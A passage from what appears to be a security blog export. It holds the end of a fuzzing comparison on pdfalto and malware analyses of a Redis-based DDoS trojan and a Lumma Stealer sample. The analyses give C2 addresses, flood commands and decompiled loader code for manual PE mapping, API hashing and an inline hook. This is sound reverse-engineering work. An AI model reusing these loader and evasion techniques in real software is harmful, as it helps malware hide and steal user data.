lower rates introducing minimal changes and higher rates inducing more extensive mutations. This approach was designed to test the resilience of the PDF processing applications across a spectrum of input perturbations, ensuring a comprehensive evaluation of their robustness under different levels of data corruption.\nWhen we ran Zzuf, it reported a large number of syntax errors for the input PDFs and quickly terminated, unlike AFL or HonggFuzz, which continued running. 
This is why Zzuf\u0026rsquo;s running time was relatively short.\nFigure 1: Example output of errors thrown by Zzuf\nThe impact of mutation rates appears to be quite limited based on the results.\nWhile Zzuf found no direct crashes, it reported 2,319k syntax-related and configuration errors. These included \u0026ldquo;Config Error\u0026rdquo; and \u0026ldquo;Syntax Error\u0026rdquo; messages, indicating flaws in input parsing but not resulting in fatal outcomes. Error rates for Zzuf were high, approximately 463.8 errors per thousand test cases.\nRadamsa (Experiment #6) The experiment aimed to evaluate the robustness of pdfalto when processing mutated PDF files generated via Radamsa. The goal was to identify syntax errors, unexpected behavior, or crashes during the parsing of malformed inputs. The observed results consist mainly of syntax errors, including the following problems:\nErrors Reading Internal Structures Invalid Characters and Unknown Operators Page Hierarchy Issues Much like Zzuf, Radamsa quickly terminated after discovering a large number of syntax errors, with very short runtime durations.\nWhile Radamsa did not find any crashes, it found many of the aforementioned errors and warnings. In particular, it did find one very interesting error message: Command Line Error: Incorrect password (see Figure 2). Apparently Radamsa fed a password-protected PDF to pdfalto. This makes sense, since there is an encrypted PDF file in our corpus.\nFigure 2: Password error found by Radamsa\nRadamsa effectively generated a number of malformed PDF files, similar to Zzuf, testing the parsing limits of pdfalto. Although no direct crashes were observed, serious syntax errors prevented some files from being fully processed. This highlights areas where the PDF parser can be improved to increase its resilience against corrupted input.\nReflection Effectiveness of the fuzzers For pdfalto, the only tool that found crashing inputs was AFL.
It found an impressive 114 crashes and 51 hangs in 12 hours. We were also able to detect a potential heap-buffer overflow using AFL + ASan. HonggFuzz found nothing despite running for 6 days.\nUnfortunately, Zzuf and Radamsa did not find a lot of interesting bugs due to the aforementioned early termination, but they did find an impressive number of errors in a short time. We think that, given enough time, they might have found some of the same flaws that AFL found.\nWe can conclude that out of the tools that we tried, AFL is the most effective for pdfalto.\nInstrumentation-based and mutation-based Generally, instrumentation-based fuzzers are considered more effective at finding complex bugs, while mutation-based fuzzers are considered faster. Our results seem to support this: instrumentation-based AFL found a lot of interesting flaws in the xpdf library, while mutation-based fuzzers Zzuf and Radamsa found a lot of errors in a short time. However, after a while, the newly reported issues were largely repetitions of the existing ones, with no new types of issues emerging.\nThis highlights the capability of instrumentation-based fuzzers to find critical execution-level issues and the ability of basic fuzzers to expose superficial input-related flaws without deeper crashes.\nComparison of mutation-based fuzzers Given identical initial inputs, Zzuf and Radamsa showed overlapping but distinct behaviour. Both tools detected syntax errors and parsing problems, but these often manifested in different ways. For example, while Zzuf generated a ‘Config Error’ with malformed configuration commands, Radamsa produced ‘Incorrect Password’ errors.\nThe main difference is that Radamsa\u0026rsquo;s wider range of mutations produced a greater variety of malformed inputs than Zzuf\u0026rsquo;s, making it slightly better for testing the resilience of pdfalto\u0026rsquo;s parsing mechanisms.
However, neither tool discovered execution faults or deep crashes, which were only revealed by the instrumentation-based fuzzer AFL.\nEffectiveness of Longer Fuzzing vs. Larger Corpus HonggFuzz ran for over six days, generating 135 million test instances, but failed to discover any vulnerabilities due to poor branch and edge coverage. This suggests that simply running fuzzers for extended periods does not necessarily improve results if inputs fail to trigger deeper code paths. In contrast, AFL produced significant results in 12 hours. We think that expanding the initial input corpus even further might improve results for HonggFuzz, although it might also be the case that HonggFuzz is fundamentally unsuited for fuzzing pdfalto for one reason or another.\nAs mentioned earlier, we first ran experiments with AFL and HonggFuzz using a single input file (not included in the testing table). It turns out that fuzzers with limited or generic initial corpora struggled to find flaws. After expanding our input corpus, AFL demonstrated its ability to find flaws across different inputs. This suggests that expanding the initial input corpus is generally more effective than extending the duration of fuzzing.\nEase of Setup Instrumentation-based tools required modifications to the codebase (e.g., enabling ASan or modifying recursion levels for AFL testing). This setup was quite involved, and we often spent considerable time getting the project to compile and run properly. Mutation-based tools Zzuf and Radamsa were simpler to deploy because they did not require us to compile the code with their dedicated compilers.\nMutation-based tools like Zzuf and Radamsa showed tool-specific error discovery patterns, revealing distinct issues with identical inputs.
They both reported a large number of syntax errors, which were not reported by HonggFuzz and AFL.\nOverall conclusion In conclusion, we ran 6 fuzzing experiments on pdfalto with AFL (with and without ASan), HonggFuzz, Zzuf (with and without ASan) and Radamsa. AFL was the most effective tool in our case, and we fixed many of the bugs behind the crashing inputs that it found. HonggFuzz was completely ineffective. Zzuf and Radamsa found some superficial and repetitive errors. Our results seem to confirm the existing notions that (1) instrumentation-based fuzzers are more effective at finding interesting bugs than mutation-based fuzzers, and (2) having a larger and more varied initial input corpus is more important than running a fuzzer for a longer time.\n","permalink":"https://blacksugar.top/posts/pdfalto/","summary":"\u003cp\u003eAs part of the \u003cem\u003eSoftware Security\u003c/em\u003e  course at Radboud University, I conducted a fuzzing project targeting \u003cstrong\u003e\u003ca href=\"https://github.com/kermitt2/pdfalto\"\u003epdfalto\u003c/a\u003e\u003c/strong\u003e, a command-line tool that converts PDF files into structured XML representations (ALTO format). The tool is written in C++ and relies heavily on the \u003cstrong\u003e\u003ca href=\"https://www.xpdfreader.com/\"\u003expdf library\u003c/a\u003e\u003c/strong\u003e, which is also implemented in C++.\u003c/p\u003e\n\u003cp\u003eWe chose pdfalto because the PDF format is notoriously complex and error-prone, and the project seemed to have practical relevance — used in real-world contexts but not widely tested with fuzzing tools. The goal was to explore the effectiveness of several fuzzers and to identify potential bugs or vulnerabilities.\u003c/p\u003e","title":"「平仲」A Glance of Fuzzing"},{"content":"0x00 Introduction REDIS-1.2-SNAPSHOT is a DDoS trojan that exploits Redis vulnerabilities to infiltrate and install itself.
The attack leverages Redis replica (slave) backup mechanisms to write a .so file onto the target machine and then directly load that shared library to execute system commands, thereby achieving installation of the REDIS-1.2-SNAPSHOT trojan. The REDIS-1.2-SNAPSHOT DDoS trojan builds command-and-control on Redis and can launch TCP and UDP flood attacks; it can also carry out targeted DDoS attacks against Minecraft game servers\u0026rsquo; handshake, login, and MOTD connections. The trojan also uses SLAVE backup and BYTE-write methods to attack other Redis servers.\n0x01 Dynamic Analysis We uploaded the trojan to the ThreatBook online sandbox and observed network traffic communicating with 45.41.240.51:6379 (the default Redis port).\n0x02 Static Analysis Inspecting the trojan with DIE shows that it is written in Go and not packed. Examining the strings in IDA also indicates the trojan has essentially no obfuscation or hardening.\nThe relevant functions and methods in the trojan are shown below.\n0x03 Main Function Directly examining the main_main method shows that the Redis server address 45.41.240.51 is hardcoded. The main_getIP method is used to obtain the current device’s external IP address.\nAfter obtaining the external IP, the trojan creates two goroutines: main_cleanusing and main_shutdownwatch.\nAfter the goroutines are successfully created, it proactively calls the main_connect method; main_connect then calls the main_listen function.\nIn the main_listen method it spawns a new goroutine that calls main_listen_func3; main_listen_func3 in turn calls main_listen2. Meanwhile, the trojan\u0026rsquo;s main goroutine polls the specified KEY and receives control instructions issued by the command-and-control server.\n0x04 SUB subscription command In main_listen2, the trojan subscribes to messages from the remote Redis server. The subscribed message queue is \u0026quot;887c194f-e726-4143-8cb7-71bea67752f5///\u0026quot; + the external IP address.
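On the wire, that subscription is an ordinary RESP SUBSCRIBE frame for the channel "\<uuid\>///\<external IP\>". The trojan's Go Redis client builds this internally; the helper below is our own C sketch of the equivalent frame, useful for recognizing the traffic in captures:

```c
#include <stdio.h>
#include <string.h>
#include <assert.h>

/* Build the RESP SUBSCRIBE command for the trojan's per-victim channel.
   The UUID prefix is the one observed in the sample; the function name
   and buffer handling are ours. */
static int build_subscribe(char *out, size_t cap, const char *ip)
{
    char chan[128];
    snprintf(chan, sizeof chan,
             "887c194f-e726-4143-8cb7-71bea67752f5///%s", ip);
    /* RESP array of two bulk strings: SUBSCRIBE <channel> */
    return snprintf(out, cap, "*2\r\n$9\r\nSUBSCRIBE\r\n$%zu\r\n%s\r\n",
                    strlen(chan), chan);
}
```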
When a message is received from the queue, it invokes main_listen2_func2 for processing, which in turn calls main_decode for further handling.\nMessages are subscribed to via PubSubConn, as shown below.\nAfter subscribing to messages with Subscribe, the trojan periodically uses Ping to check the connectivity of the Redis server.\n0x05 GET polling command In the main goroutine main_listen, the trojan directly establishes a connection with the Redis server. If the connection cannot be created, it sleeps for a fixed period before retrying.\nAfter the connection is successfully established, the trojan actively reads string messages from the \u0026quot;atkavxc\u0026quot; key. The retrieved messages are then passed to main_decode for decryption.\n0x06 DEC command decryption After obtaining commands through SUB subscription or GET polling, the trojan decrypts them using main_decode, which in turn calls main_DecryptAES for AES decryption.\nThe decryption code for main_DecryptAES is shown below, where the decryption key main_Key is itself decrypted within the main_init method.\nThe AES key handling code in main_init is as follows.\n0x07 MET command execution The decrypted command is deserialized into a JSON object, and fields such as method, target, and uniqueAttackID are extracted step by step for subsequent command execution.\nDifferent operations are performed depending on the command fields (e.g., method, target, etc.).\n7.1 UDP and TCP FLOOD attacks TCP FLOOD attack When METHOD equals 6 and TARGET is socket (as below — requires reversing and concatenating the string), the trojan parses fields such as length, threads, etc.\nVia the SOCKETFlood_func1 method it calls dosocket, creating the number of goroutines specified by threads to establish TCP connections with the target server or network segment.\nBelow is the code related to CIDR subnet matching.\nUDP FLOOD attack When METHOD equals 3 and TARGET is udp (as shown below — requires reversing and concatenating the 
string), the trojan parses fields such as length, threads, etc.\nVia the UDPFlood_func1 method it calls method_do, creating the number of goroutines specified by threads to establish UDP connections with the target server or network segment.\n7.2 REDIS FLOOD attack REDIS CPS attack When TARGET is redis-cps (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads, delay, and reflectionIPs.\nparse reflectionIPs\nIt creates the number of goroutines specified by threads; each goroutine runs REDISCPSflood_func1, and REDISCPSflood_func1 in turn calls sendcpsredis.\nThe sendcpsredis method configures the remote Redis instance as a SLAVE to synchronize the attack exploit (EXP).\nREDIS-BYTE command When METHOD equals 10 and TARGET is redis-byte (as shown below — requires reversing and concatenating the string), it parses fields such as threads, delay, and reflectionIPs.\nIt creates the number of goroutines specified by threads; each goroutine runs REDISBYTEflood_func1, and REDISBYTEflood_func1 in turn calls redis_methods_redisbyteflood.\n7.3 MINECRAFT FLOOD attack Uses the Infrared codebase to encapsulate Minecraft handshake, login, and MOTD packets for targeted DDoS attacks against Minecraft game servers.\nHANDSHAKE FLOOD attack When METHOD equals 9 and TARGET is handshake (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls sendhs to carry out the attack.\nUses the Infrared codebase to craft Minecraft handshake packets and send them to the target server to carry out the attack.\nMOTD FLOOD attack When METHOD equals 4 and TARGET is MOTD (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls func1 to handle the attack.\nUses the Infrared codebase to craft Minecraft MOTD (Message Of The Day) packets and send them to the target server to carry out the attack.\nLOGIN FLOOD attack When 
METHOD equals 5 and TARGET is login (as shown below — requires reversing and concatenating the string), the trojan parses fields such as threads and then calls func1 to handle the attack.\nUses the Infrared codebase to construct Minecraft LOGIN packets and send them to the target server to carry out the attack.\n0x08 shutdown method The main_shutdown method attempts to establish a connection to the attacker\u0026rsquo;s Redis server.\nAfter successfully establishing the Redis connection, the trojan publishes the current device\u0026rsquo;s IP to the \u0026quot;8f0df21e-9b9f-4a12-acf4-43f9df738050\u0026quot; key to report the information.\nThe trojan actively reads the remote Redis shutdown value; if it finds the value equals DIE, it exits immediately and prints the message: \u0026quot;Asked to die cuz yeh\u0026quot;.\n0x09 IOC sha256 redis-1.2-snapshot d4238ffc217e039eaf5cc89cf387df58b67d01129b88e0b053e16c37ae09192d ","permalink":"https://blacksugar.top/posts/redis_snapshot/","summary":"\u003ch2 id=\"0x00-introduction\"\u003e0x00 Introduction\u003c/h2\u003e\n\u003cp\u003eREDIS-1.2-SNAPSHOT is a DDoS trojan that exploits Redis vulnerabilities to infiltrate and install itself. The attack leverages Redis replica (slave) backup mechanisms to write a \u003ccode\u003e.so\u003c/code\u003e file onto the target machine and then directly load that shared library to execute system commands, thereby achieving installation of the REDIS-1.2-SNAPSHOT trojan. The REDIS-1.2-SNAPSHOT DDoS trojan builds command-and-control on Redis and can launch TCP and UDP flood attacks; it can also carry out targeted DDoS attacks against Minecraft game servers\u0026rsquo; handshake, login, and MOTD connections.
The trojan also uses SLAVE backup and BYTE-write methods to attack other Redis servers.\u003c/p\u003e","title":"「平仲」Analysis of the REDIS-SNAPSHOT DDoS Trojan"},{"content":"LUMMA offers Malware-as-a-Service (MaaS) for information-stealing trojans, enabling its customers to directly build trojans on the platform. The MaaS platform also supports parsing, extracting, and retrieving stolen data such as databases and text files, significantly lowering the barrier to entry for data theft attacks. The LUMMA technical development team continues to refine the trojan\u0026rsquo;s data exfiltration capabilities, which currently include stealing browser data, cryptocurrency keys, KEEPASS password databases, and more. To effectively evade antivirus solutions, LUMMA does not employ VMProtect (VMP) packing technology but instead utilizes a string obfuscation method referred to by the technical team as the \u0026ldquo;MORPHER\u0026rdquo; solution.\nThis instance of Lumma Stealer was discovered on an image resource website. Graphic designers within companies often search for art resources across various websites, making them potential targets for attackers. By uploading such malicious files, attackers can easily compromise users who lack the ability to identify threats, leading them to execute the malicious files.\nGiven the relatively simple functionality of this sample, this article provides only a preliminary analysis of its core data-theft capabilities through dynamic debugging.\nHowever, in stark contrast to its straightforward malicious behavior, the sample employs a notably complex dynamic loading mechanism. The latter half of this article will therefore focus on an in-depth analysis of this Loading Mechanism.\nStatic Analysis As we can see, the original compressed package is only about 2MB.\nAfter extraction, there exists a file named \u0026ldquo;Case example of work_1\u0026rdquo; with the .scr extension (while the rest are numerous JPG files each around 2MB in size). 
This .scr file, however, is a full 720MB. It is also worth noting that with file extensions hidden, the file appears indistinguishable from a regular image file, making it very likely to be executed unintentionally.\nExamining the file with a binary editor shows that it contains extensive null-byte padding. This technique is commonly used to bypass antivirus detection, as security software typically does not perform deep scans on very large files.\nDIE (Detect It Easy) failed to identify any valid packer or protector information. This suggests that the file might be either unprotected, or utilizing a custom/obscure packing method that is not recognized by the tool\u0026rsquo;s signature database.\nWhen the file is loaded into IDA, it raises a \u0026ldquo;too big function\u0026rdquo; error. As expected, the attacker has likely implemented obfuscation techniques to complicate analysis.\nAfter modifying the IDA \u0026ldquo;max function size\u0026rdquo; configuration and reopening the file, it is evident that the code contains numerous meaningless repetitive code segments with multi-layered nested loops. The purposes of these techniques are:\nTo artificially inflate the size of functions To interfere with Hex-Rays decompilation To trigger \u0026ldquo;too big function\u0026rdquo; errors in analysis tools To delay and hinder the analysis process It should be noted that these obfuscation methods do not affect the actual execution logic of the program.\nChecking the import table, no suspicious imported functions have been identified so far. It is speculated that key DLLs or functions are dynamically loaded into memory and decrypted during runtime for execution. The next step will shift to dynamic analysis.\nDynamic Analysis Anti-Anti-Debugging After directly running the malware through x64dbg, it terminated rapidly, clearly indicating the presence of anti-debugging measures.
Setting a breakpoint at IsDebuggerPresent reveals that the return value is 1, confirming that the Trojan has enabled anti-debugging checks. This can be bypassed simply by modifying the return value.\nAlternatively, for a more convenient approach, using the Basic configuration option in ScyllaHide can achieve the same result of bypassing the anti-debugging protection.\nNetwork Request Breakpoint Through Huorong Sword analysis, it can be observed that the program attempts to connect to the remote C2 server at 82.118.23.50.\nAfter execution, examining the symbols loaded by the Trojan reveals the presence of winhttp.dll. This DLL was not initially loaded when the process was first attached in x32dbg, indicating it was dynamically decrypted during runtime. This observation aligns with the earlier hypothesis based on static analysis.\n(The specific decryption logic would require dynamic debugging of LoadLibrary/GetProcAddress calls to determine exactly when winhttp.dll is loaded, which is a complex process and will be discussed later.)\nA breakpoint has been set at WinHttpConnect for further analysis.\nContinuing with single-step debugging, the remote C2 address and API endpoint (/c2sock) of the Trojan have been identified. It can be observed that the Trojan uses the HTTP POST method to transmit data to the server. The presence of a \u0026ldquo;boundary\u0026rdquo; string suggests that the Trojan uploads various types of user files. The next step involves conducting a detailed dynamic analysis of the data uploaded by the Trojan.\nThe following describes how the malware program traverses and scans the User Data directories of browsers such as Chrome, Chromium, and Edge:\nThe malware attempts to read configurations of applications such as FileZilla, AnyDesk, KeePass, Steam, etc., in order to steal sensitive information.\nScanning for encrypted wallet data. The relevant paths can be dumped, with partial fields shown below. 
The string dx765 is used as a delimiter and obfuscation field to evade detection.\nThe communication traffic can also be captured using Wireshark, revealing that the data is transmitted via HTTP POST requests in plaintext.\nTechnical Analysis of the Trojan’s Dynamic Loading Mechanism The previous sections have already described the core functionality of the malware. In this section, we conduct a deeper analysis of the dynamic loading and control-flow disruption techniques that were observed during debugging.\nDynamic Loading Chain Analysis We set a breakpoint on ntdll.LdrLoadDll, and after several hits we observed the DLL loading process in action. By repeatedly using “Execute till return”, we continued stepping out of system DLL frames until the execution finally reached a region of non-DLL (user module) address space.\nAfter the jump, the address changes to 03CD5BF7.\nChecking the Modules view revealed that execution had now entered the address space of a module named utilman.exe.\nExamining the surrounding context showed that utilman.exe invoked LoadLibraryW, and the argument passed to it was winhttp.dll. This indicates that utilman.exe was acting as a loader at this stage of execution. 
The remaining question is: how was utilman.exe itself invoked in the first place?\nWe then inspected the call stack to trace the call chain.\nThe resulting call chain is as follows:\nntdll … -\u0026gt; case_example.00401233 -\u0026gt; case_example.004251D0 -\u0026gt; kernelbase.HeapDestroy -\u0026gt; case_example.00401D1A ← malware -\u0026gt; utilman.03CCA273 ← malware utilman -\u0026gt; utilman.03CCEEDA ← call LoadLibraryW(\u0026#34;winhttp.dll\u0026#34;) We then examined the disassembly around address 0x401D1A.\nlet\u0026rsquo;s translate the assembly a bit\n; === This is where utilman.exe is actually loaded === 00401CC5 mov dword ptr [esp+4], offset 586D26h ; L\u0026#34;utilman.exe\u0026#34; 00401CCD mov eax, dword ptr [ebp-24] 00401CD0 mov dword ptr [esp], eax ; 1st argument = [ebp-24] 00401CD3 mov eax, dword ptr [ebp-10] ; eax = function pointer 00401CD6 call eax ; fn([ebp-24], L\u0026#34;utilman.exe\u0026#34;) 00401CD8 sub esp, 8 00401CDB mov byte ptr ds:[58B025h], 1 ; global flag: utilman has been loaded ; === Invoke the “stage 1” callback === 00401CE2 mov eax, dword ptr [ebp-28] 00401CE5 mov dword ptr [esp+0Ch], eax ; arg3 = [ebp-28] 00401CE9 mov eax, dword ptr [ebp-24] 00401CEC mov dword ptr [esp+8], eax ; arg2 = [ebp-24] 00401CF0 mov dword ptr [esp+4], 0 00401CF8 mov dword ptr [esp], 0 00401CFF mov eax, dword ptr [ebp-0Ch] ; eax = function pointer #1 00401D02 call eax ; fn1(0, 0, [ebp-24], [ebp-28]) ; === Invoke the “stage 2” callback (this actually jumps into utilman) === 00401D04 sub esp, 10h 00401D07 mov eax, dword ptr [ebp-28] ; offset 00401D0A test eax, eax 00401D0C je 401D1Ah ; if offset == 0, exit 00401D0E mov eax, dword ptr [ebp-28] ; eax = offset 00401D11 mov edx, eax 00401D13 mov eax, dword ptr [ebp-1Ch] ; eax = base 00401D16 add eax, edx ; eax = base + offset 00401D18 call eax ; call (base + offset) 00401D1A nop 00401D1B leave 00401D1C ret This logic becomes fairly straightforward:\nInstead of calling LoadLibraryW directly to load winhttp.dll, 
the malware first manually maps utilman.exe into its own process, and then leverages a function inside utilman—located via base + offset—to indirectly invoke: LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;);\nThis block of code at 0x401CAB–0x401D1A functions as a “module + callback loader”, with the following workflow:\nIt constructs the necessary parameters using its own helper routines.\nIt invokes a generic loader function stored at [ebp-10] to load utilman.exe.\nIt sets a global flag to indicate that utilman has been successfully loaded.\nIt calls a callback at [ebp-0C] to perform additional initialization.\nFinally, it computes base + offset to dynamically jump into a specific function inside utilman (address 03CCA273). That internal utilman function subsequently calls:\nLoadLibraryW(L\u0026#34;winhttp.dll\u0026#34;); thereby preparing WinHTTP for the malware’s C2 communications.\nmanual mapper We then moved further up to analyze the function at 0x401924. At this point, we can continue the investigation via static analysis in IDA.\n_DWORD *__cdecl sub_401924(int a1) { _DWORD *result; // eax int v3; // [esp+38h] [ebp-48h] BYREF int v4; // [esp+3Ch] [ebp-44h] unsigned int v5; // [esp+40h] [ebp-40h] int v6; // [esp+44h] [ebp-3Ch] _DWORD *v7; // [esp+48h] [ebp-38h] int v8; // [esp+4Ch] [ebp-34h] int v9; // [esp+50h] [ebp-30h] int v10; // [esp+54h] [ebp-2Ch] unsigned __int16 v11; // [esp+5Ah] [ebp-26h] int v12; // [esp+5Ch] [ebp-24h] int v13; // [esp+60h] [ebp-20h] int v14; // [esp+64h] [ebp-1Ch] _WORD *v15; // [esp+68h] [ebp-18h] unsigned int v16; // [esp+6Ch] [ebp-14h] _DWORD *v17; // [esp+70h] [ebp-10h] int i; // [esp+74h] [ebp-Ch] v14 = a1; v13 = *(_DWORD *)(a1 + 60) + a1; if ( (*(_WORD *)(v13 + 22) \u0026amp; 0x2000) == 0 ) *(_WORD *)(v13 + 22) += 0x2000; v3 = *(_DWORD *)(v13 + 80); v12 = dword_58B03C(-1, \u0026amp;dword_58B02C, 0, \u0026amp;v3, 12288, 64); v11 = *(_WORD *)(v13 + 6); v10 = *(unsigned __int16 *)(v13 + 20) + v13 + 24; v9 = 40 * v11 + v10 - a1; 
sub_401410(dword_58B02C, a1, v9); for ( i = 0; i \u0026lt; v11; ++i ) sub_401410( dword_58B02C + *(_DWORD *)(40 * i + v10 + 12), *(_DWORD *)(40 * i + v10 + 20) + a1, *(_DWORD *)(40 * i + v10 + 16)); v8 = v13 + 160; v7 = (_DWORD *)(dword_58B02C + *(_DWORD *)(v13 + 160)); v17 = v7; v6 = dword_58B02C - *(_DWORD *)(v13 + 52); v5 = (unsigned int)v7 + *(_DWORD *)(v13 + 164); while ( 1 ) { result = v17; if ( (unsigned int)v17 \u0026gt;= v5 ) break; result = (_DWORD *)*v17; if ( !*v17 ) break; v16 = (unsigned int)(v17[1] - 8) \u0026gt;\u0026gt; 1; v15 = v17 + 2; v4 = dword_58B02C + *v17; while ( v16-- ) { if ( (int)(unsigned __int16)*v15 \u0026gt;\u0026gt; 12 == 3 ) *(_DWORD *)((*v15 \u0026amp; 0xFFF) + v4) += v6; ++v15; } v17 = (_DWORD *)((char *)v17 + v17[1]); } return result; } unsigned int __cdecl sub_401410(int a1, int a2, unsigned int a3) { unsigned int result; // eax unsigned int i; // [esp+Ch] [ebp-4h] for ( i = 0; ; ++i ) { result = i; if ( a3 \u0026lt;= i ) break; *(_BYTE *)(i + a1) = *(_BYTE *)(i + a2); } return result; } At this point, how utilman.exe is brought into the process is clear:\nsub_401924 acts as a manual PE loader (manual mapper), and sub_401410 is the simple memcpy routine it relies on.\nThe function takes a pointer a1 to a PE image (which, at this stage, we can confidently identify as the file image of utilman.exe), remaps it into a newly allocated memory region according to the PE structure layout, and applies relocations.\nAfter this manual mapping is complete, the later base + offset logic can treat this image as if it were a normal DLL, and indirectly jump into an internal utilman function that eventually calls:\nLoadLibraryW(L\u0026#34;winhttp.dll\u0026#34;); thereby completing the setup required for WinHTTP-based C2 communication.\nFollowing sub_401924, we move one level up to analyze its caller at 0x401C50. 
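The copy phase of sub_401924 is the standard manual-mapping walk over the PE headers and section table. A simplified, self-contained C mirror of that traversal (relocation fix-ups omitted; offsets follow the PE header layout, names are ours):

```c
#include <stdint.h>
#include <string.h>
#include <assert.h>

static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }

/* "img" is a raw PE file image; "dst" stands in for the freshly
   allocated region that sub_401924 obtains via dword_58B03C. */
static void map_sections(uint8_t *dst, const uint8_t *img)
{
    const uint8_t *nt  = img + rd32(img + 0x3C);   /* e_lfanew -> NT headers */
    uint16_t nsec      = rd16(nt + 6);             /* NumberOfSections       */
    uint16_t optsz     = rd16(nt + 20);            /* SizeOfOptionalHeader   */
    const uint8_t *sec = nt + 24 + optsz;          /* first section header   */

    /* Headers: everything up to the end of the section table
       (the v9 = 40 * v11 + v10 - a1 computation). */
    memcpy(dst, img, (size_t)(sec + 40u * nsec - img));

    for (uint16_t i = 0; i < nsec; ++i) {          /* one 40-byte entry each */
        const uint8_t *s = sec + 40u * i;
        memcpy(dst + rd32(s + 12),                 /* VirtualAddress    */
               img + rd32(s + 20),                 /* PointerToRawData  */
               rd32(s + 16));                      /* SizeOfRawData     */
    }
}
```

The relocation loop that follows in sub_401924 then walks the base-relocation directory and adds the load delta to every type-3 (HIGHLOW) entry, exactly as the decompiled while loop shows.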
Going further up the call chain leads back into the previously discussed obfuscated region, which we can safely ignore for the purposes of this analysis. At this point, we can consider our dynamic loading analysis to be essentially complete.\nint __cdecl sub_401C50(int a1) { // 1) Resolve two function pointers from a module (a1 = ??, here dword_58B030) // using the malware’s hash-based API lookup. v10 = (void (__stdcall *)(_DWORD, _DWORD)) sub_40185D(dword_58B030, dword_582108); v9 = (void (__stdcall *)(_DWORD *, const char *, int, int)) sub_40185D(dword_58B030, dword_58210C); v8 = a1; // a1 = raw PE image of utilman.exe v7 = *(_DWORD *)(a1 + 60) + a1; // NtHeaders (a1 + e_lfanew) v6 = *(_DWORD *)(v7 + 40); // OptionalHeader.AddressOfEntryPoint *(_DWORD *)(v7 + 40) = 0; // Clear the original EP to prevent automatic execution // 2) Manually map this PE: the previously analyzed sub_401924 sub_401924(a1); // allocate memory + copy sections + perform relocations // 3) Install the inline hook sub_401B71(); // 4) Use the two dynamically-resolved functions (v9 / v10) as a wrapper layer. // v9(v5, \u0026#34;u\u0026#34;, v2, v3); \u0026lt;-- here v5 is a small structure; \u0026#34;u\u0026#34; appears to be an ID/type. v9(v5, \u0026#34;u\u0026#34;, v2, v3); byte_58B025 = 1; // mark the module as “loaded” v5[0] = \u0026amp;v4; // v5.first = \u0026amp;v4 v4 = v5; // v4 now points to the v5 structure // v10(0, 0) will use v5[0] (which points to v4) to write back the actual base // of the manually-mapped module into v4. v10(0, 0); result = (int)v4; if ( v4 ) // 5) If v4 is not NULL, treat (v4 + original entrypoint offset) as a function pointer // and jump into the mapped utilman image. 
return ((int (*)(void))((char *)v4 + v6))(); return result; } int __cdecl sub_40185D(int a1, int a2) { int v3; // [esp+14h] [ebp-24h] int v4; // [esp+18h] [ebp-20h] int v5; // [esp+1Ch] [ebp-1Ch] _DWORD *v6; // [esp+20h] [ebp-18h] unsigned int i; // [esp+2Ch] [ebp-Ch] v6 = (_DWORD *)(*(_DWORD *)(*(_DWORD *)(a1 + 60) + a1 + 120) + a1); v5 = v6[7] + a1; v4 = v6[8] + a1; v3 = v6[9] + a1; for ( i = 0; i \u0026lt; v6[7]; ++i ) { if ( a2 == sub_4014AD((char *)(*(_DWORD *)(4 * i + v4) + a1)) ) return *(_DWORD *)(4 * *(unsigned __int16 *)(2 * i + v3) + v5) + a1; } return 0; } sub_40185D: Resolve a function address from a PE image using a hash a1 is the base address of a module in memory. *(a1 + 60) corresponds to the DOS header’s e_lfanew field. a1 + *(a1 + 60) + 120 effectively evaluates to NtHeader + 0x78. At this offset, the malware uses a DataDirectory entry—but treats its RVA as a pointer to a custom structure instead of a standard directory. v6 becomes the base address of this custom structure. unsigned int __cdecl sub_4014AD(char *Str) { unsigned int v3 = 1000; for ( i = 0; strlen(Str) \u0026gt; i; ++i ) v3 += ((v3 \u0026gt;\u0026gt; 2) + Str[i]) ^ 0x10; return v3; } sub_4014AD: Name-hashing function\nThe purpose of this routine is straightforward: it computes a 32-bit hash from a string (typically a function name). This hash is then compared against constants such as dword_582108 and dword_58210C.\nIn other words:\nThe sample has precomputed hash values for specific API names and stored them in constants like dword_582108. At runtime, it iterates over an export-like structure and applies sub_4014AD to each function name. When the computed hash matches a2, the malware considers that function to be the one it is looking for. 
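The routine is small enough to lift directly into a standalone helper; running candidate API names through it and comparing the results against the stored constants is how we would recover which APIs dword_582108 and dword_58210C refer to (we have not confirmed the specific names):

```c
#include <stdint.h>
#include <string.h>
#include <assert.h>

/* Re-implementation of sub_4014AD, matching the decompiled arithmetic
   (for ASCII names the signedness of char makes no difference). */
static uint32_t api_hash(const char *s)
{
    uint32_t h = 1000;
    for (size_t i = 0; i < strlen(s); ++i)
        h += ((h >> 2) + (uint32_t)(unsigned char)s[i]) ^ 0x10u;
    return h;
}
```

Because the hash folds position into the accumulator, it is order-sensitive, so anagrams of a name do not collide.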
This is a classic API-hashing technique, commonly used to hide real API names and impede static analysis.

Inline API Hook

unsigned int sub_401B71()
{
  int v1; // [esp+34h] [ebp-28h] BYREF
  int v2; // [esp+38h] [ebp-24h] BYREF
  char v3[7]; // [esp+3Ch] [ebp-20h] BYREF
  int v4; // [esp+43h] [ebp-19h] BYREF
  char v5; // [esp+47h] [ebp-15h]
  int v6[5]; // [esp+48h] [ebp-14h] BYREF

  dword_58B028 = sub_40185D(dword_58B030, dword_58212C);
  sub_401410((int)\u0026amp;unk_58B020, dword_58B028, 5u);
  v6[2] = (int)sub_401693;
  v6[1] = dword_58B028 + 5;
  v6[0] = (int)sub_401693 - dword_58B028 - 5;
  v4 = 233;
  v5 = 0;
  sub_401410((int)\u0026amp;v4 + 1, (int)v6, 4u);
  v2 = 5;
  v1 = dword_58B028;
  dword_58B038(-1, \u0026amp;v1, \u0026amp;v2, 64, v3);
  return sub_401410(dword_58B028, (int)\u0026amp;v4, 5u);
}

This routine locates a target function inside the module referenced by dword_58B030 (almost certainly ntdll) by matching its hashed name. It then saves the first five bytes of that function and overwrites them with a JMP sub_401693 instruction: v4 = 233 is the 0xE9 opcode, and v6[0] = sub_401693 - dword_58B028 - 5 is the 32-bit relative displacement that follows it.

Relationship Between sub_401C50 / sub_401924 and the Inline Hook

Putting the pieces together, the workflow becomes:

sub_401C50(a1):

- a1 is the raw PE image of utilman.exe.
